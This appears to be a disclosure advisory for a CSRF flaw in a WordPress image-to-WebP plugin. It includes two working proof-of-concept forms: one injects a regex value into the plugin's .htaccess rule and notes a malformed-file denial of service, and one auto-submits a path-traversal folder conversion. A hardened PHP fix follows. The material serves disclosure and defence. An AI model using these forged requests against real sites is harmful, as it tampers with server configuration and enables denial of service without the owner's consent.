The plugin does not have CSRF checks in place when performing some administrative actions, which could result in modification of plugin settings, denial of service, and arbitrary image conversion.
The PoC varies based on the endpoint targeted. Here is one example that will modify the website's .htaccess file when the form is submitted by a logged-in user.

    <form action="https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=general" method="post" enctype="application/x-www-form-urlencoded" id="form">
      <input type="hidden" name="plugin_sent" value="1">
      <input type="hidden" name="webp_quality" value="50">
      <input type="hidden" name="upload_convert" value="1">
      <input type="hidden" name="method" value="gd">
      <input type="hidden" name="extensions[]" value="jpg">
      <!-- Inject regular expression. You can also add invalid regex to make a malformed .htaccess file and DoS. -->
      <input type="hidden" name="extensions[]" value="INJECT_VALUE_HERE)|(.*">
      <input type="submit">
    </form>

The following converts the files in C:\xampp\htdocs\png_images if WordPress is installed on C:\xampp\htdocs\wordpress\; the path is relative to wp-content.

    <form action="https://example.com/wp-admin/admin-ajax.php" method="post" enctype="application/x-www-form-urlencoded" id="form">
      <input type="hidden" name="action" value="convert_old_images">
      <input type="hidden" name="only_missing" value="0">
      <input type="hidden" name="folder" value="../../png_images">
    </form>
    <script>form.submit()</script>
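As an added example (not the plugin's or the advisory's own code), the hypothetical PHP below shows what handlers for the two endpoints above look like with the missing checks in place: a nonce and capability check on both, an allowlist plus preg_quote() before the extension list is written into a RewriteCond pattern, and realpath() confinement of the folder parameter to wp-content. The itw_ prefix, option names and nonce action strings are assumptions.

```php
<?php
// Hypothetical hardened handlers (not the plugin's own code). Assumed names:
// the itw_ prefix, option names and nonce action strings are made up here.
// Settings form handler: the form must carry a nonce emitted with
// wp_nonce_field( 'itw_save_settings', 'itw_nonce' ) on the settings page.
add_action( 'admin_init', function () {
    if ( empty( $_POST['plugin_sent'] ) ) {
        return;
    }
    // Dies unless a valid nonce is present, so a forged cross-site POST
    // never reaches the code below; then require an administrator.
    check_admin_referer( 'itw_save_settings', 'itw_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // Keep only extensions from a fixed allowlist.
    $allowed    = array( 'jpg', 'jpeg', 'png', 'gif' );
    $submitted  = array_map( 'strtolower', (array) ( $_POST['extensions'] ?? array() ) );
    $extensions = array_values( array_intersect( $submitted, $allowed ) );
    // Escape every value before it becomes part of the RewriteCond pattern,
    // so a value such as "jpg)|(.*" can neither widen the match nor leave
    // .htaccess syntactically broken.
    $pattern = implode( '|', array_map( 'preg_quote', $extensions ) );
    $rule    = 'RewriteCond %{REQUEST_URI} \.(' . $pattern . ')$ [NC]';
    update_option( 'itw_extensions', $extensions );
    update_option( 'itw_webp_quality', min( 100, max( 1, (int) ( $_POST['webp_quality'] ?? 80 ) ) ) );
    update_option( 'itw_rewrite_rule', $rule );
} );

// AJAX conversion handler: nonce, capability, and a folder confined to wp-content.
add_action( 'wp_ajax_convert_old_images', function () {
    check_ajax_referer( 'itw_convert', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $base   = realpath( WP_CONTENT_DIR );
    $folder = ltrim( (string) ( $_POST['folder'] ?? '' ), '/\\' );
    $target = realpath( $base . DIRECTORY_SEPARATOR . $folder );
    // realpath() resolves "../" segments, so anything that ends up outside
    // wp-content (e.g. "../../png_images") is rejected before conversion.
    if ( false === $target || ( $target !== $base && 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) ) {
        wp_send_json_error( 'folder must be inside wp-content', 400 );
    }
    // The actual image conversion of $target would run here.
    wp_send_json_success( array( 'folder' => $target ) );
} );
```

The AJAX caller would pass the nonce produced by wp_create_nonce( 'itw_convert' ) in the nonce field; without it check_ajax_referer() terminates the request before any conversion starts.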
apple502j
Yes
2021-10-19
2022-04-11